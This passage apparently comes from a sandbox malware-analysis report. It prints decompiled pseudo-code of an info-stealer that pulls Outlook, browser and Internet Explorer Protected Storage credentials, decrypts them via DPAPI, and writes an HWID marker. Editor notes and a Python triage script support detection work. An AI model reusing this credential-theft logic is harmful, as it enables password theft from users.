                                                                                                                                          • Part of subcall function 0BC0491E: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000,?,00000000,?,?,00000000), ref: 0BC0494C
                                                                                                                                          • Part of subcall function 0BC0491E: CoTaskMemFree.OLE32(?,?,00000000,?,?,00000000), ref: 0BC04955
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0BC05EB9
                                                                                                                                        • CoTaskMemFree.OLE32(?), ref: 0BC05EC5
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0BC05EE3
                                                                                                                                        • lstrcmpiA.KERNEL32(?,identification), ref: 0BC05F55
                                                                                                                                        • lstrcmpiA.KERNEL32(?,identitymgr), ref: 0BC05F67
                                                                                                                                        • lstrcmpiA.KERNEL32(?,inetcomm server passwords), ref: 0BC05F79
                                                                                                                                        • CoTaskMemFree.OLE32(?), ref: 0BC05FB3
                                                                                                                                        • lstrcmpiA.KERNEL32(?,outlook account manager passwords), ref: 0BC05FD4
                                                                                                                                        • lstrcmpiA.KERNEL32(?,identities), ref: 0BC05FED
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcmpi$ByteCharFreeMultiTaskWide
                                                                                                                                        • String ID: identification$identities$identitymgr$inetcomm server passwords$outlook account manager passwords
                                                                                                                                        • API String ID: 636431001-4287852900
                                                                                                                                        • Opcode ID: 60efff7665865bd7df21b898b16a2bd3454457f85b93879385d6463c1a101453
                                                                                                                                        • Instruction ID: b1c6782f6857a44e9a2350b7d0b8525bcc70d060167d7db9b9e2e7ceb6952409
                                                                                                                                        • Opcode Fuzzy Hash: 60efff7665865bd7df21b898b16a2bd3454457f85b93879385d6463c1a101453
                                                                                                                                        • Instruction Fuzzy Hash: 30512EB1921128EBEB20DB55CD84EDABBBDEF49650F0046D5FA09E2181DF709B85CF60
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.05%

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E0BC069E3(CHAR* _a4, intOrPtr _a8) {
                                                                                                                                        				char _v8;
                                                                                                                                        				CHAR* _v12;
                                                                                                                                        				intOrPtr _v16;
                                                                                                                                        				CHAR* _v20;
                                                                                                                                        				CHAR* _v24;
                                                                                                                                        				CHAR* _v28;
                                                                                                                                        				void* __edi;
                                                                                                                                        				char* _t15;
                                                                                                                                        				void* _t18;
                                                                                                                                        				signed int _t28;
                                                                                                                                        				CHAR* _t29;
                                                                                                                                        				void* _t33;
                                                                                                                                        
                                                                                                                                        				_t29 = _a4;
				E0BC09AF4(_t29);
				_t15 = StrStrIA(_t29, " ");
				_t28 = 0;
				if(_t15 == 0) {
					return 0;
				}
				 *_t15 = 0;
				E0BC09AF4(_t29);
				_v28 = "CONSTRAINT";
				_v24 = "PRIMARY";
				_v20 = "UNIQUE";
				_v16 = "CHECK";
				_v12 = "FOREIGN";
				_v8 = 0;
				while(lstrcmpiA( *(_t33 + _t28 * 4 - 0x18), _t29) != 0) {
					_t28 = _t28 + 1;
					if(_t28 < 6) {
						continue;
					}
					if(lstrlenA(_t29) != 0) {
						if(lstrcmpiA(_t29, "hostname") != 0) {
							if(lstrcmpiA(_t29, "encryptedPassword") != 0) {
								if(lstrcmpiA(_t29, "encryptedUsername") == 0) {
									 *0xbc10d4c = _a8;
								}
							} else {
								 *0xbc10d20 = _a8;
							}
						} else {
							 *0xbc10d58 = _a8;
						}
						_t18 = 1;
						L14:
						return _t18;
					}
					break;
				}
				_t18 = 0;
				goto L14;
			}

APIs
  • Part of subcall function 0BC09AF4: lstrlenA.KERNEL32(?,?,0BC02C6D), ref: 0BC09B49
• StrStrIA.SHLWAPI(?,0BC0D7DC), ref: 0BC069F9
• lstrcmpiA.KERNEL32(0BC0DA30,?), ref: 0BC06A45
• lstrlenA.KERNEL32(?), ref: 0BC06A52
Strings
Memory Dump Source
• Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
Yara matches
Similarity
• API ID: lstrlen$lstrcmpi
• String ID: CHECK$CONSTRAINT$FOREIGN$PRIMARY$UNIQUE$encryptedPassword$encryptedUsername$hostname
• API String ID: 1808961391-3777071345
• Opcode ID: 1b32111c77ca1ba984af6a85aedaaa34c705f77729cfc4ddb0cc9f031589110e
• Instruction ID: 3d252539fe9e258e2a2af782e527374c6fef5cf7e855ccd82ed781ebd47b0966
• Opcode Fuzzy Hash: 1b32111c77ca1ba984af6a85aedaaa34c705f77729cfc4ddb0cc9f031589110e
• Instruction Fuzzy Hash: 7411B470B31206AF8B00FFA59C8496F7BF8EA45598700C476EC13E6291EF70D611AAA0
Uniqueness

Uniqueness Score: 100.00%

C-Code - Quality: 100%
			E0BC02C5D(CHAR* _a4, intOrPtr _a8) {
				char _v8;
				CHAR* _v12;
				intOrPtr _v16;
				CHAR* _v20;
				CHAR* _v24;
				CHAR* _v28;
				void* __edi;
				char* _t15;
				void* _t18;
				signed int _t28;
				CHAR* _t29;
				void* _t33;

				_t29 = _a4;
				E0BC09AF4(_t29);
				_t15 = StrStrIA(_t29, " ");
				_t28 = 0;
				if(_t15 == 0) {
					return 0;
				}
				 *_t15 = 0;
				E0BC09AF4(_t29);
				_v28 = "CONSTRAINT";
				_v24 = "PRIMARY";
				_v20 = "UNIQUE";
				_v16 = "CHECK";
				_v12 = "FOREIGN";
				_v8 = 0;
				while(lstrcmpiA( *(_t33 + _t28 * 4 - 0x18), _t29) != 0) {
					_t28 = _t28 + 1;
					if(_t28 < 6) {
						continue;
					}
					if(lstrlenA(_t29) != 0) {
						if(lstrcmpiA(_t29, "action_url") != 0) {
							if(lstrcmpiA(_t29, "password_value") != 0) {
								if(lstrcmpiA(_t29, "username_value") == 0) {
									 *0xbc10d18 = _a8;
								}
							} else {
								 *0xbc10d40 = _a8;
							}
						} else {
							 *0xbc10d60 = _a8;
						}
						_t18 = 1;
						L14:
						return _t18;
					}
					break;
				}
				_t18 = 0;
				goto L14;
			}

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0BC09AF4: lstrlenA.KERNEL32(?,?,0BC02C6D), ref: 0BC09B49
                                                                                                                                        • StrStrIA.SHLWAPI(?,0BC0D7DC), ref: 0BC02C73
                                                                                                                                        • lstrcmpiA.KERNEL32(0BC0DA30,?), ref: 0BC02CBF
                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0BC02CCC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
Yara matches
Similarity
• API ID: lstrlen$lstrcmpi
• String ID: CHECK$CONSTRAINT$FOREIGN$PRIMARY$UNIQUE$action_url$password_value$username_value
• API String ID: 1808961391-315308160
• Opcode ID: 916d158c776eb85a832560cba4d0eb778a1333bdd63e6b9491d2ca2545128a27
• Instruction ID: 280bba07be5b177455d40353d73563d4ef557128d93031e216dbb23a7c0b5620
• Opcode Fuzzy Hash: 916d158c776eb85a832560cba4d0eb778a1333bdd63e6b9491d2ca2545128a27
• Instruction Fuzzy Hash: 3911B970B35216BE8B00DFA59C88A6F7FF8FA459847104475EC13EA291EF70DA45DAA0
Uniqueness

Uniqueness Score: 100.00%

C-Code - Quality: 77%
// Note (editor annotation, not plugin output): this function reads one Protected Storage
// (PStore) item and decides whether to hand it to E0BC04B07 for collection. The 8-argument
// call through vtable slot +0x44, the CoTaskMemFree of the returned buffer and the 0x10-byte
// prompt structure (cbSize 0x10, flags 2) are consistent with IPStore::ReadItem called with a
// _PST_PROMPTINFO of PST_PF_NEVER_SHOW; the plugin did not resolve the interface, so treat that
// identification as an inference. The asm("sbb eax, eax") plus "~_tNN + 1" pairs are the
// decompiler's rendering of the neg/sbb idiom that turns each lstrcmpiA result into a 0/1 flag
// on the names "Internet Explorer", "WininetCacheCredentials" and "MS IE FTP Passwords". Items
// whose name carries the "DPAPI: " prefix are routed through E0BC01000, which (see APIs below)
// resolves CryptUnprotectData from Crypt32.dll; its output is released with LocalFree. The
// address the plugin associates with each statement is given in the leading comment.
E0BC04C40(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, intOrPtr _a16, intOrPtr* _a20) {
    signed int _v12;        // stack cookie
    char _v1040;            // narrow name filled in by E0BC0491E and compared against the three PStore names
    char _v2064;            // narrow copy of the item name _a12, checked for the "DPAPI: " prefix
    intOrPtr _v2068;
    char _v2072;            // item data pointer returned through the vtable call (freed with CoTaskMemFree)
    short* _v2076;
    char _v2080;            // item data size returned through the vtable call
    intOrPtr _v2084;
    void* _v2088;           // output blob pointer from E0BC01000 (freed with LocalFree)
    char _v2092;            // output blob size from E0BC01000
    intOrPtr _v2096;        // input blob: pbData
    char _v2100;            // input blob: cbData
    int _v2104;
    int _v2108;
    intOrPtr _v2112;
    char _v2116;            // 0x10-byte prompt structure passed to the vtable call
    void* __ebx;
    void* __edi;
    void* __esi;
    signed int _t46;
    signed int _t60;
    signed int _t63;
    signed int _t66;
    intOrPtr _t77;
    void* _t88;
    intOrPtr* _t89;
    signed int _t91;

/* 0bc04c40 */    _t88 = __edx;
/* 0bc04c49 */    _t46 =  *0xbc10000; // 0xbb40e64e
/* 0bc04c50 */    _v12 = _t46 ^ _t91;
/* 0bc04c56 */    _v2068 = _a8;
/* 0bc04c60 */    _t77 = _a4;
/* 0bc04c63 */    _v2076 = _a12;
/* 0bc04c6d */    _v2084 = _a16;
/* 0bc04c74 */    _t89 = _a20;
/* 0bc04c81 */    E0BC0491E(_t89, __ecx, _t77,  &_v1040);
/* 0bc04ca2 */    WideCharToMultiByte(0, 0, _v2076, 0xffffffff,  &_v2064, 0x3ff, 0, 0);
/* 0bc04cc6 */    _v2116 = 0x10;
/* 0bc04cd6 */    _v2112 = 2;
/* 0bc04ce3 */    _v2108 = 0;
/* 0bc04ce9 */    _v2104 = 0;
/* 0bc04cef */    _t57 =  *((intOrPtr*)( *_t89 + 0x44))(_t89, 0, _t77, _v2068, _v2076,  &_v2080,  &_v2072,  &_v2116, 0);
                  // No data came back: nothing to free, leave.
/* 0bc04cf8 */    if(_v2080 == 0 || _v2072 == 0) {
/* 0bc04e08 */        L10:
/* 0bc04e16 */        return E0BC09FDC(_t57, _t77, _v12 ^ _t91, _t88, _t89, 0);
/* 0bc04d0a */    } else {
/* 0bc04d0a */        _t89 = lstrcmpiA;
/* 0bc04d1c */        _t60 = lstrcmpiA( &_v1040, "Internet Explorer");
/* 0bc04d20 */        asm("sbb eax, eax");
/* 0bc04d22 */        _t57 =  ~_t60 + 1;
/* 0bc04d23 */        if( ~_t60 + 1 == 0) {
/* 0bc04d35 */            _t63 = lstrcmpiA( &_v1040, "WininetCacheCredentials");
/* 0bc04d39 */            asm("sbb eax, eax");
/* 0bc04d3b */            _t57 =  ~_t63 + 1;
/* 0bc04d3c */            if( ~_t63 + 1 == 0) {
/* 0bc04d4e */                _t66 = lstrcmpiA( &_v1040, "MS IE FTP Passwords");
/* 0bc04d52 */                asm("sbb eax, eax");
/* 0bc04d54 */                _t57 =  ~_t66 + 1;
/* 0bc04d55 */                if( ~_t66 + 1 == 0) {
                                  // Item name without the "DPAPI: " prefix: the raw item data is collected as-is.
/* 0bc04d6f */                    if(StrStrIA( &_v2064, "DPAPI: ") == 0) {
/* 0bc04df4 */                        _t57 = E0BC04B07(_v2084, _v2076, _v2072, _v2080);
/* 0bc04d71 */                    } else {
                                      // "DPAPI: " item: wrap size/pointer as a blob, decrypt via E0BC01000, collect, free.
/* 0bc04d77 */                        _v2100 = _v2080;
/* 0bc04d83 */                        _v2096 = _v2072;
/* 0bc04da2 */                        if(E0BC01000( &_v2100, 0,  &_v2092) != 0) {
/* 0bc04dc1 */                            E0BC04B07(_v2084, _v2076, _v2088, _v2092);
/* 0bc04dcf */                            _t57 = LocalFree(_v2088);
/* 0bc04dcf */                        }
/* 0bc04da2 */                    }
/* 0bc04d6f */                }
/* 0bc04d55 */            }
/* 0bc04d3c */        }
/* 0bc04e02 */        __imp__CoTaskMemFree(_v2072);
/* 00000000 */        goto L10;
/* 0bc04e02 */    }
              }

APIs
  • Part of subcall function 0BC0491E: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000,?,00000000,?,?,00000000), ref: 0BC0494C
  • Part of subcall function 0BC0491E: CoTaskMemFree.OLE32(?,?,00000000,?,?,00000000), ref: 0BC04955
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0BC04CA2
• lstrcmpiA.KERNEL32(?,Internet Explorer), ref: 0BC04D1C
• lstrcmpiA.KERNEL32(?,WininetCacheCredentials), ref: 0BC04D35
• lstrcmpiA.KERNEL32(?,MS IE FTP Passwords), ref: 0BC04D4E
• StrStrIA.SHLWAPI(?,DPAPI: ), ref: 0BC04D67
  • Part of subcall function 0BC01000: LoadLibraryA.KERNEL32(Crypt32.dll), ref: 0BC01008
  • Part of subcall function 0BC01000: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 0BC01014
  • Part of subcall function 0BC04B07: lstrlenW.KERNEL32(?), ref: 0BC04B16
• LocalFree.KERNEL32(?), ref: 0BC04DCF
• CoTaskMemFree.OLE32(?), ref: 0BC04E02
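Added example (editor's code, not Joe Sandbox output and not code from the sample): a small Python triage helper that parses the APIs list above into records and flags the Protected Storage credential-harvest pattern visible in E0BC04C40, i.e. the three Internet Explorer PStore names compared with lstrcmpiA, the "DPAPI: " item-name check, and the dynamic CryptUnprotectData resolution, reporting the call-site addresses as evidence. The line grammar is taken from the entries printed here; the allowance for dotted module names, the set of string-compare APIs and the two-name threshold are assumptions. The sample input is the list above, embedded as a constant.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed input: the "APIs" list printed under E0BC04C40 in this report, copied
# verbatim. Subcall entries are indented and carry the callee address.
SAMPLE_API_LINES = """\
  • Part of subcall function 0BC0491E: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000,?,00000000,?,?,00000000), ref: 0BC0494C
  • Part of subcall function 0BC0491E: CoTaskMemFree.OLE32(?,?,00000000,?,?,00000000), ref: 0BC04955
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0BC04CA2
• lstrcmpiA.KERNEL32(?,Internet Explorer), ref: 0BC04D1C
• lstrcmpiA.KERNEL32(?,WininetCacheCredentials), ref: 0BC04D35
• lstrcmpiA.KERNEL32(?,MS IE FTP Passwords), ref: 0BC04D4E
• StrStrIA.SHLWAPI(?,DPAPI: ), ref: 0BC04D67
  • Part of subcall function 0BC01000: LoadLibraryA.KERNEL32(Crypt32.dll), ref: 0BC01008
  • Part of subcall function 0BC01000: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 0BC01014
  • Part of subcall function 0BC04B07: lstrlenW.KERNEL32(?), ref: 0BC04B16
• LocalFree.KERNEL32(?), ref: 0BC04DCF
• CoTaskMemFree.OLE32(?), ref: 0BC04E02
"""

# "<api>.<module>(<args>), ref: <addr>", optionally prefixed by the subcall note.
# Allowing dots in the module name is an assumption (for names such as "ws2_32.dll").
_LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>[\w.]+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
_HEX_CONST = re.compile(r"[0-9A-Fa-f]{8}")


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple                    # raw tokens: "?" = unresolved, 8 hex digits = constant, else a string
    ref: int                       # call-site address
    subcall: Optional[int] = None  # callee address when the call happens inside a subcall


def parse_api_lines(text: str) -> list:
    """Turn the plugin's API list into ApiCall records; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = _LINE_RE.match(line)
        if not m:
            continue
        args = tuple(m.group("args").split(",")) if m.group("args") else ()
        calls.append(ApiCall(api=m.group("api"), module=m.group("mod"), args=args,
                             ref=int(m.group("ref"), 16),
                             subcall=int(m.group("sub"), 16) if m.group("sub") else None))
    return calls


def string_literals(call: ApiCall) -> list:
    """Arguments the plugin resolved to a string (an 8-hex-digit token is taken as a constant)."""
    return [a for a in call.args if a != "?" and not _HEX_CONST.fullmatch(a)]


# Protected Storage names the sample compares against (strings from the listing above) and the
# item-name prefix that routes an item through CryptUnprotectData.
PSTORE_IE_NAMES = frozenset({"Internet Explorer", "WininetCacheCredentials", "MS IE FTP Passwords"})
DPAPI_PREFIX = "DPAPI: "
_STRCMP_APIS = {"lstrcmpiA", "lstrcmpA", "lstrcmpiW", "lstrcmpW"}  # assumption: APIs worth matching


def find_pstore_harvest(calls: list) -> Optional[dict]:
    """Report the PStore credential-harvest pattern when at least two of the names are compared.

    The result carries the call site of each matched name, of the "DPAPI: " probe and of the
    CryptUnprotectData resolution, so an analyst can jump straight to them in the dump.
    """
    compared = {}
    for c in calls:
        if c.api in _STRCMP_APIS:
            for s in string_literals(c):
                if s in PSTORE_IE_NAMES:
                    compared[s] = c.ref
    if len(compared) < 2:
        return None
    dpapi_probe = [c.ref for c in calls if c.api.startswith("StrStrI") and DPAPI_PREFIX in c.args]
    dpapi_decrypt = [c.ref for c in calls
                     if c.api == "CryptUnprotectData"
                     or (c.api == "GetProcAddress" and "CryptUnprotectData" in c.args)]
    return {
        "names": compared,
        "dpapi_prefix_check": dpapi_probe,
        "dpapi_decrypt": dpapi_decrypt,
        "decrypts_dpapi_blobs": bool(dpapi_probe and dpapi_decrypt),
    }


def _fmt(value):
    """Render addresses the way the report prints them."""
    if isinstance(value, dict):
        return {k: f"{r:08X}" for k, r in value.items()}
    if isinstance(value, list):
        return [f"{r:08X}" for r in value]
    return value


if __name__ == "__main__":
    finding = find_pstore_harvest(parse_api_lines(SAMPLE_API_LINES))
    for key, value in (finding or {}).items():
        print(f"{key}: {_fmt(value)}")
```

Paste the APIs block of any function from a report into a file and feed it to parse_api_lines; "?" arguments are values the plugin could not resolve and are ignored when collecting string literals, so a function that compares against the names through a register rather than an immediate string will not be flagged and still needs a manual look.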
Strings
Memory Dump Source
• Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
Yara matches
Similarity
• API ID: Freelstrcmpi$ByteCharMultiTaskWide$AddressLibraryLoadLocalProclstrlen
• String ID: DPAPI: $Internet Explorer$MS IE FTP Passwords$WininetCacheCredentials
• API String ID: 546506139-3076635702
• Opcode ID: 58bcf04aba1a50f4b97153809b16df455677b88a013f921074f6ae59c044260b
• Instruction ID: 0a463ee3beba161a93ce0069a31fe69384aa045d567325105bcacba7ca86d68e
• Opcode Fuzzy Hash: 58bcf04aba1a50f4b97153809b16df455677b88a013f921074f6ae59c044260b
• Instruction Fuzzy Hash: 4941097192112DABCB24AF64CC45ADABBF8FF08700F0481E5A559A2280DF319B95CFE0
Uniqueness

Uniqueness Score: 0.14%

C-Code - Quality: 88%
// Note (editor annotation, not plugin output): this function stores or reads a value named
// "HWID" (by its name, an installation/hardware identifier; that purpose is inferred). It first
// tries the registry key Software\Skype under the hive handle held at 0xbc10010; if
// RegCreateKeyA fails it falls back to a file named HWID in the temp directory, opened with
// GENERIC_READ|GENERIC_WRITE (0xc0000000), FILE_SHARE_READ|FILE_SHARE_WRITE (3) and
// CREATE_ALWAYS (2). Both locations are host artefacts worth checking during triage.
E0BC09812(char* __ecx, void* __edx, int _a4) {
    signed int _v8;         // stack cookie
    char _v272;             // temp-directory path buffer (0x104 = MAX_PATH bytes)
    long _v276;
    CHAR* _v280;            // full path of the fallback HWID file
    void* _v284;            // HKEY returned by RegCreateKeyA
    void* _v288;            // HANDLE returned by CreateFileA
    char* _v292;
    void* __ebx;
    void* __edi;
    void* __esi;
    signed int _t31;
    long _t34;
    long _t36;
    void* _t41;
    CHAR* _t44;
    void* _t45;
    void* _t64;
    signed int _t67;

    _t64 = __edx;
    _t31 =  *0xbc10000; // 0xbb40e64e
    _v8 = _t31 ^ _t67;
    _t66 = __ecx;
    _v292 = __ecx;
    _v276 = 0;
    // Primary location: value "HWID" under Software\Skype in the hive whose handle is at 0xbc10010.
    _t34 = RegCreateKeyA( *0xbc10010, "Software\\Skype",  &_v284);
    _t65 = "HWID";
    if(_t34 != 0) {
        L4:
        // Fallback: a file named HWID in the temp directory. E0BC08F95 appears to test whether
        // the path already ends in a separator and E0BC08EE2/E0BC08F32 append to it (the names
        // are the plugin's; the roles are inferred from the call pattern).
        _t66 = 0x104;
        _t36 = GetTempPathA(0x104,  &_v272);
        if(_t36 != 0 && _t36 <= 0x104) {
            CreateDirectoryA( &_v272, 0);
            _t66 =  &_v272;
            _t41 = E0BC08F95(_t66);
            _push(_t66);
            if(_t41 != 0) {
                _t44 = E0BC08EE2(_t65);
            } else {
                E0BC08EE2("\\");
                _t44 = E0BC08F32(_t66, _t65);
            }
            _v280 = _t44;
            // GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, CREATE_ALWAYS
            _t45 = CreateFileA(_t44, 0xc0000000, 3, 0, 2, 0, 0);
            _v288 = _t45;
            if(_t45 == 0xffffffff) {   // INVALID_HANDLE_VALUE
                L17:
                DeleteFileA(_v280);
            } else {
                _t65 = _a4;
                                                                                                                                        							_t66 = 0;
                                                                                                                                        							while(1) {
                                                                                                                                        								_v276 = 0;
                                                                                                                                        								if(WriteFile(_v288, _v292 + _t66, _t65,  &_v276, 0) == 0 || _v276 == 0) {
                                                                                                                                        									break;
                                                                                                                                        								}
                                                                                                                                        								_t66 =  &(_t66[_v276]);
                                                                                                                                        								_t65 = _t65 - _v276;
                                                                                                                                        								if(_t65 != 0) {
                                                                                                                                        									continue;
                                                                                                                                        								} else {
                                                                                                                                        									_v276 = 1;
                                                                                                                                        								}
                                                                                                                                        								L16:
                                                                                                                                        								CloseHandle(_v288);
                                                                                                                                        								if(_v276 == 0) {
                                                                                                                                        									goto L17;
                                                                                                                                        								}
                                                                                                                                        								goto L18;
                                                                                                                                        							}
                                                                                                                                        							_v276 = 0;
                                                                                                                                        							goto L16;
                                                                                                                                        						}
                                                                                                                                        						L18:
                                                                                                                                        						E0BC08D3D(_v280);
                                                                                                                                        					}
                                                                                                                                        				} else {
                                                                                                                                        					if(RegSetValueExA(_v284, "HWID", 0, 3, _t66, _a4) == 0) {
                                                                                                                                        						_v276 = 1;
                                                                                                                                        					}
                                                                                                                                        					RegCloseKey(_v284);
                                                                                                                                        					if(_v276 == 0) {
                                                                                                                                        						goto L4;
                                                                                                                                        					}
                                                                                                                                        				}
                                                                                                                                        				return E0BC09FDC(_v276, 0, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                        			}

                                                                                                                                        APIs
                                                                                                                                        • RegCreateKeyA.ADVAPI32(Software\Skype,?,?), ref: 0BC0984A
                                                                                                                                        • RegSetValueExA.ADVAPI32(?,HWID,00000000,00000003,?,0BC02734), ref: 0BC09867
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0BC09881
                                                                                                                                        • GetTempPathA.KERNEL32(00000104,?), ref: 0BC098A0
                                                                                                                                        • CreateDirectoryA.KERNEL32(?,00000000), ref: 0BC098BE
                                                                                                                                        • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000000,00000000), ref: 0BC09909
                                                                                                                                        • WriteFile.KERNEL32(?,?,0BC02734,?,00000000), ref: 0BC0993D
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0BC09975
                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0BC09989
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFile$Close$DeleteDirectoryHandlePathTempValueWrite
                                                                                                                                        • String ID: HWID$Software\Skype
                                                                                                                                        • API String ID: 1781080854-498293505
                                                                                                                                        • Opcode ID: 32430f215b679bcbceab4d51ffa7710896eebf0e00317a8f7c43888acae79ad3
                                                                                                                                        • Instruction ID: 06b5ad80a0d3e2e4f661c8dbc52b5e44eec4f918b80bb4b620688f91c78c5e2b
                                                                                                                                        • Opcode Fuzzy Hash: 32430f215b679bcbceab4d51ffa7710896eebf0e00317a8f7c43888acae79ad3
                                                                                                                                        • Instruction Fuzzy Hash: 67411071D2012C9FDB259F69DC45BDABBB9FB08754F0046A5F619A2181DBB08F80CFA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.18%

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E0BC06AA8(intOrPtr _a8, intOrPtr _a12, char* _a16, intOrPtr _a20) {
                                                                                                                                        				char _v8;
                                                                                                                                        				char _v12;
                                                                                                                                        				char _v16;
                                                                                                                                        				char _v20;
                                                                                                                                        				char _v24;
                                                                                                                                        				char _v28;
                                                                                                                                        				void* __ebx;
                                                                                                                                        				void* __edi;
                                                                                                                                        				void* __esi;
                                                                                                                                        				intOrPtr _t37;
                                                                                                                                        				intOrPtr _t45;
                                                                                                                                        				int _t46;
                                                                                                                                        				intOrPtr _t61;
                                                                                                                                        				intOrPtr _t69;
                                                                                                                                        				char* _t71;
                                                                                                                                        				char* _t74;
                                                                                                                                        				intOrPtr _t88;
                                                                                                                                        				void* _t98;
                                                                                                                                        
                                                                                                                                        				_t74 = _a16;
                                                                                                                                        				if(_t74 == 0) {
                                                                                                                                        					L26:
                                                                                                                                        					return _t37;
                                                                                                                                        				}
                                                                                                                                        				_t37 =  *0xbc10d58; // 0x0
                                                                                                                                        				if(_t37 >= _t74) {
                                                                                                                                        					goto L26;
                                                                                                                                        				}
                                                                                                                                        				_t69 =  *0xbc10d4c; // 0x0
                                                                                                                                        				if(_t69 >= _t74) {
                                                                                                                                        					L25:
                                                                                                                                        					return _t37;
                                                                                                                                        				}
                                                                                                                                        				_t88 =  *0xbc10d20; // 0x0
                                                                                                                                        				if(_t88 >= _t74) {
                                                                                                                                        					L24:
                                                                                                                                        					goto L25;
                                                                                                                                        				}
                                                                                                                                        				E0BC0326D(_t37,  &_a16,  &_v24,  &_v8, _a12);
                                                                                                                                        				E0BC0326D(_t69,  &_v16,  &_v24,  &_v20, _a12);
                                                                                                                                        				_t37 = E0BC0326D(_t88,  &_v12,  &_v28,  &_v24, _a12);
                                                                                                                                        				_t96 = _a16;
                                                                                                                                        				if(_a16 == 0 || _v12 == 0) {
                                                                                                                                        					L23:
                                                                                                                                        					goto L24;
                                                                                                                                        				} else {
					_t71 = E0BC08D51( &(_t96[1]));
					_a16 = _t71;
					E0BC08D91(_v8, _t71, _t96);
					_t45 =  *0xbc10d54; // 0x3
					if(_t45 != 0) {
						if(_t45 != 1) {
							if(_t45 != 2) {
								_t46 = _a16;
							} else {
								_t46 = 0;
							}
						} else {
							_t96 = "ftp.";
							_t46 = StrCmpNIA(_t71, _t96, lstrlenA(_t96));
						}
						L15:
						if(_t46 != 0) {
							L22:
							_t37 = E0BC08D3D(_a16);
							goto L23;
						}
						L16:
						_t85 = _v16;
						if(_v16 == 0) {
							L18:
							_v8 = E0BC08EE2(" ", " ");
							L19:
							_t80 = _v24;
							_t98 = E0BC06347(_v24, _v12, _t96);
							if(_a16 != 0 && _t98 != 0) {
								_t90 = _a8;
								E0BC08C37(_a20);
								_v24 = 1;
								E0BC08A41( &_v24, _t80, _a8, 4);
								E0BC08C6D(_a8, _t80, _a16);
								E0BC08C6D(_a8, _t80, _v8);
								E0BC08C6D(_t90, _t80, _t98);
								E0BC08D3D(_v8);
								E0BC08D3D(_t98);
							}
							goto L22;
						}
						_t61 = E0BC06347(_v20, _t85, _t96);
						_v8 = _t61;
						if(_t61 != 0) {
							goto L19;
						}
						goto L18;
					}
					_t96 = "ftp://";
					if(StrCmpNIA(_t71, _t96, lstrlenA(_t96)) == 0) {
						goto L16;
					}
					_t96 = "http://";
					if(StrCmpNIA(_a16, _t96, lstrlenA(_t96)) == 0) {
						goto L16;
					} else {
						_t96 = "https://";
						_t46 = StrCmpNIA(_a16, _t96, lstrlenA(_t96));
						goto L15;
					}
				}
			}

APIs
  • Part of subcall function 0BC08D51: LocalAlloc.KERNELBASE(00000040,?,0BC08E59), ref: 0BC08D57
  • Part of subcall function 0BC08D91: GetModuleHandleA.KERNEL32(ntdll.dll,memmove,?,0BC09AB6,00000000,00000000,00000000,?,?,?), ref: 0BC08D9E
  • Part of subcall function 0BC08D91: GetProcAddress.KERNEL32(00000000), ref: 0BC08DA5
• lstrlenA.KERNEL32(ftp://,?,00000000,?), ref: 0BC06B60
• StrCmpNIA.SHLWAPI(00000000,ftp://,00000000), ref: 0BC06B6B
